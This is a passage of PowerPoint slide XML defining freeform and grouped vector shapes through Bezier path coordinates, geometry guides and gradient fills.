                    <a:gd name="T10" fmla="*/ 3 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 205 h 245"/>
                    <a:gd name="T16" fmla="*/ 44 w 90"/>
                    <a:gd name="T17" fmla="*/ 204 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 51 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 39 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 51 h 245"/>
                    <a:gd name="T24" fmla="*/ 44 w 90"/>
                    <a:gd name="T25" fmla="*/ 204 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 88 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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  <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="170"/>
                        <a:pt x="46" y="55"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="36" y="46"/>
                        <a:pt x="36" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="46"/>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="55"/>
                        <a:pt x="43" y="170"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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0000"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="000000">
                        <a:gamma/>
                        <a:tint val="74118"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="00000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63" name="Freeform 1148">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14F9CF88-5987-4F63-899B-D53ACCB6DBF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736" y="1118"/>
                  <a:ext cx="266" cy="310"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231">
                      <a:moveTo>
                        <a:pt x="192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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="17"/>
                        <a:pt x="8" y="139"/>
                        <a:pt x="4" y="159"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="180"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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000000"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="000000">
                        <a:gamma/>
                        <a:tint val="74118"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="00000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64" name="Freeform 1149">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EF325DB-DA5B-41E1-8FEF-4AD296D28C7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822" y="1101"/>
                  <a:ext cx="88" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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65" name="Oval 1150">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A62D8449-2C8E-4744-8DBC-5923D75B2B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flipH="1">
                  <a:off x="3810" y="1032"/>
                  <a:ext cx="106" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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70" name="Group 375">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{866BD3A8-7F66-4B64-BE14-0B249E3B9EA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flipH="1">
              <a:off x="3939314" y="3540227"/>
              <a:ext cx="723900" cy="711200"/>
              <a:chOff x="762" y="611"/>
              <a:chExt cx="2797" cy="2753"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="740" name="Freeform 376">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85DF853F-2416-4B79-B761-631D0CC5A61F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861" y="611"/>
                <a:ext cx="1786" cy="2415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 743 w 756"/>
                  <a:gd name="T1" fmla="*/ 46 h 1022"/>
                  <a:gd name="T2" fmla="*/ 743 w 756"/>
                  <a:gd name="T3" fmla="*/ 46 h 1022"/>
                  <a:gd name="T4" fmla="*/ 743 w 756"/>
                  <a:gd name="T5" fmla="*/ 20 h 1022"/>
                  <a:gd name="T6" fmla="*/ 710 w 756"/>
                  <a:gd name="T7" fmla="*/ 11 h 1022"/>
                  <a:gd name="T8" fmla="*/ 704 w 756"/>
                  <a:gd name="T9" fmla="*/ 10 h 1022"/>
                  <a:gd name="T10" fmla="*/ 502 w 756"/>
                  <a:gd name="T11" fmla="*/ 149 h 1022"/>
                  <a:gd name="T12" fmla="*/ 502 w 756"/>
                  <a:gd name="T13" fmla="*/ 149 h 1022"/>
                  <a:gd name="T14" fmla="*/ 178 w 756"/>
                  <a:gd name="T15" fmla="*/ 570 h 1022"/>
                  <a:gd name="T16" fmla="*/ 168 w 756"/>
                  <a:gd name="T17" fmla="*/ 585 h 1022"/>
                  <a:gd name="T18" fmla="*/ 90 w 756"/>
                  <a:gd name="T19" fmla="*/ 700 h 1022"/>
                  <a:gd name="T20" fmla="*/ 63 w 756"/>
                  <a:gd name="T21" fmla="*/ 986 h 1022"/>
                  <a:gd name="T22" fmla="*/ 63 w 756"/>
                  <a:gd name="T23" fmla="*/ 986 h 1022"/>
                  <a:gd name="T24" fmla="*/ 104 w 756"/>
                  <a:gd name="T25" fmla="*/ 997 h 1022"/>
                  <a:gd name="T26" fmla="*/ 144 w 756"/>
                  <a:gd name="T27" fmla="*/ 966 h 1022"/>
                  <a:gd name="T28" fmla="*/ 144 w 756"/>
                  <a:gd name="T29" fmla="*/ 1011 h 1022"/>
                  <a:gd name="T30" fmla="*/ 183 w 756"/>
                  <a:gd name="T31" fmla="*/ 1022 h 1022"/>
                  <a:gd name="T32" fmla="*/ 719 w 756"/>
                  <a:gd name="T33" fmla="*/ 262 h 1022"/>
                  <a:gd name="T34" fmla="*/ 719 w 756"/>
                  <a:gd name="T35" fmla="*/ 217 h 1022"/>
                  <a:gd name="T36" fmla="*/ 743 w 756"/>
                  <a:gd name="T37" fmla="*/ 46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56" h="1022">
                    <a:moveTo>
                      <a:pt x="743" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="46"/>
                      <a:pt x="743" y="46"/>
                      <a:pt x="743" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="11"/>
                      <a:pt x="706" y="10"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="653" y="0"/>
                      <a:pt x="573" y="58"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502" y="149"/>
                      <a:pt x="502" y="149"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="570"/>
                      <a:pt x="178" y="570"/>
                      <a:pt x="178" y="570"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="575"/>
                      <a:pt x="171" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="619"/>
                      <a:pt x="114" y="657"/>
                      <a:pt x="90" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="842"/>
                      <a:pt x="0" y="969"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="217"/>
                      <a:pt x="719" y="217"/>
                      <a:pt x="719" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="747" y="146"/>
                      <a:pt x="756" y="84"/>
                      <a:pt x="743" y="46"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="545554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1" name="Freeform 377">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21AAB399-7D22-44B4-B1A8-A208B48204FA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953" y="635"/>
                <a:ext cx="1795" cy="2391"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 719 w 760"/>
                  <a:gd name="T1" fmla="*/ 16 h 1012"/>
                  <a:gd name="T2" fmla="*/ 704 w 760"/>
                  <a:gd name="T3" fmla="*/ 10 h 1012"/>
                  <a:gd name="T4" fmla="*/ 502 w 760"/>
                  <a:gd name="T5" fmla="*/ 149 h 1012"/>
                  <a:gd name="T6" fmla="*/ 502 w 760"/>
                  <a:gd name="T7" fmla="*/ 150 h 1012"/>
                  <a:gd name="T8" fmla="*/ 178 w 760"/>
                  <a:gd name="T9" fmla="*/ 571 h 1012"/>
                  <a:gd name="T10" fmla="*/ 168 w 760"/>
                  <a:gd name="T11" fmla="*/ 585 h 1012"/>
                  <a:gd name="T12" fmla="*/ 91 w 760"/>
                  <a:gd name="T13" fmla="*/ 700 h 1012"/>
                  <a:gd name="T14" fmla="*/ 68 w 760"/>
                  <a:gd name="T15" fmla="*/ 987 h 1012"/>
                  <a:gd name="T16" fmla="*/ 144 w 760"/>
                  <a:gd name="T17" fmla="*/ 966 h 1012"/>
                  <a:gd name="T18" fmla="*/ 144 w 760"/>
                  <a:gd name="T19" fmla="*/ 1012 h 1012"/>
                  <a:gd name="T20" fmla="*/ 719 w 760"/>
                  <a:gd name="T21" fmla="*/ 262 h 1012"/>
                  <a:gd name="T22" fmla="*/ 719 w 760"/>
                  <a:gd name="T23" fmla="*/ 218 h 1012"/>
                  <a:gd name="T24" fmla="*/ 719 w 760"/>
                  <a:gd name="T25" fmla="*/ 16 h 10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60" h="1012">
                    <a:moveTo>
                      <a:pt x="719" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="715" y="13"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="0"/>
                      <a:pt x="573" y="58"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502" y="150"/>
                      <a:pt x="502" y="150"/>
                      <a:pt x="502" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="575"/>
                      <a:pt x="172" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="619"/>
                      <a:pt x="114" y="658"/>
                      <a:pt x="91" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="846"/>
                      <a:pt x="0" y="974"/>
                      <a:pt x="68" y="987"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="991"/>
                      <a:pt x="115" y="984"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1012"/>
                      <a:pt x="144" y="1012"/>
                      <a:pt x="144" y="1012"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="218"/>
                      <a:pt x="719" y="218"/>
                      <a:pt x="719" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="759" y="119"/>
                      <a:pt x="760" y="38"/>
                      <a:pt x="719" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A0A0A0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2" name="Freeform 378">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BC9FC9C-0B4D-46F3-B64F-38371B8E4A9B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293" y="2792"/>
                <a:ext cx="813" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 813"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 813 w 813"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 813 w 813"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 813"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 813"/>
                  <a:gd name="T9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3" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="813" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="451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3" name="Freeform 379">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{884E0739-1C35-417F-A26B-5DE065D0AB30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293" y="2731"/>
                <a:ext cx="1040" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 813 w 1040"/>
                  <a:gd name="T1" fmla="*/ 278 h 278"/>
                  <a:gd name="T2" fmla="*/ 1040 w 1040"/>
                  <a:gd name="T3" fmla="*/ 217 h 278"/>
                  <a:gd name="T4" fmla="*/ 227 w 1040"/>
                  <a:gd name="T5" fmla="*/ 0 h 278"/>
                  <a:gd name="T6" fmla="*/ 0 w 1040"/>
                  <a:gd name="T7" fmla="*/ 61 h 278"/>
                  <a:gd name="T8" fmla="*/ 813 w 1040"/>
                  <a:gd name="T9" fmla="*/ 27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0" h="278">
                    <a:moveTo>
                      <a:pt x="813" y="278"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1040" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="278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4" name="Freeform 380">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE15672-0CAF-46A8-BA27-DABBCE8F5BE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520" y="2497"/>
                <a:ext cx="813" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 813"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 813 w 813"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 813 w 813"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 813"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 813"/>
                  <a:gd name="T9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3" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="813" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="451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5" name="Freeform 381">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92EA7DDB-794F-4654-A34C-E557463AE8A8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520" y="2435"/>
                <a:ext cx="1039" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 813 w 1039"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1039 w 1039"/>
                  <a:gd name="T3" fmla="*/ 218 h 279"/>
                  <a:gd name="T4" fmla="*/ 227 w 1039"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1039"/>
                  <a:gd name="T7" fmla="*/ 62 h 279"/>
                  <a:gd name="T8" fmla="*/ 813 w 1039"/>
                  <a:gd name="T9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9" h="279">
                    <a:moveTo>
                      <a:pt x="813" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1039" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="279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6" name="Freeform 382">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBC7ED94-F7F7-46D1-9160-DCC13F27E85A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747" y="2201"/>
                <a:ext cx="812" cy="452"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 812"/>
                  <a:gd name="T1" fmla="*/ 0 h 452"/>
                  <a:gd name="T2" fmla="*/ 812 w 812"/>
                  <a:gd name="T3" fmla="*/ 218 h 452"/>
                  <a:gd name="T4" fmla="*/ 812 w 812"/>
                  <a:gd name="T5" fmla="*/ 452 h 452"/>
                  <a:gd name="T6" fmla="*/ 0 w 812"/>
                  <a:gd name="T7" fmla="*/ 234 h 452"/>
                  <a:gd name="T8" fmla="*/ 0 w 812"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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2" h="452">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="812" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="452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7" name="Freeform 383">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{747B5760-11A6-4AB2-9D9E-8C6E8B80DB14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747" y="2140"/>
                <a:ext cx="1037" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 812 w 1037"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 217 h 279"/>
                  <a:gd name="T4" fmla="*/ 226 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 61 h 279"/>
                  <a:gd name="T8" fmla="*/ 812 w 1037"/>
                  <a:gd name="T9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7" h="279">
                    <a:moveTo>
                      <a:pt x="812" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="279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8" name="Freeform 384">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{396E5B9A-EBEE-47A8-A9C4-9A291D523E7A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973" y="1906"/>
                <a:ext cx="811" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 811"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 811 w 811"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 811 w 811"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 811"/>
